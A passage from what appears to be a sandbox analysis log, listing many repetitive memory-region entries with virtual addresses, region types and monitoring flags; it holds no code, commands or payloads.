pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3694 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3695 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 3696 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 3697 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 3698 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 3699 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 3700 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 3701 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 3702 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 3703 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 3704 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 3705 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 3706 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 3707 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 3708 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3709 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3710 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3711 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3712 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3713 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3714 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3715 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3716 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3717 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3718 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3719 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 3720 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 3721 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3722 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3723 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3724 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 3725 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 3726 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 3727 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 3728 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 3729 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 3730 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 3731 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 3732 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 3733 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 3734 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 3735 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 3736 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 3737 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 3738 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 3739 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 3740 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 3741 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 3742 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 3743 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 3744 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 3745 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3746 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3747 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3748 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3749 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3750 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3751 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3752 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3753 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 3754 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 3755 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3756 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3757 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 3758 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 3759 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3760 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3761 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3762 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3763 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3764 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3765 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3766 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3767 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3768 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3769 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3770 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3771 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3772 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3773 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3774 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3775 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3776 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 3777 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 3778 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 3779 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 3780 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 3781 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3782 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3783 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3784 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3785 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3786 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3787 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3788 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3789 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3790 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3791 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3792 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3793 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3794 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3795 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3796 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3797 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3798 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3799 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3800 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3801 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3802 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3803 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3804 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3805 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3806 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3807 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3808 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3809 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3810 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3811 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3812 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3813 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3814 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3815 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3816 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3817 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3818 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3819 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3820 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3821 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3822 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3823 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3824 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3825 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3826 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3827 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3828 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3829 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3830 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3831 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3832 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 3833 start_va = 0x1ea0000 end_va = 0x1ea0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001ea0000" filename = "" Region: id = 3834 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 3835 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 3836 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 3837 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3838 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3839 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3840 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3841 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3842 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3843 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3844 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3845 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3846 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3847 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3848 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3849 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3850 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3851 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3852 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 3853 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 3854 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 3855 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 3856 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3857 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3858 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3859 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3860 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3861 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3862 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3863 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3864 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3865 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3866 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3867 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3868 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3869 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3870 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3871 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3872 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3873 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3874 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3875 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3876 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3877 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 3878 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 3879 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3880 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3881 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = 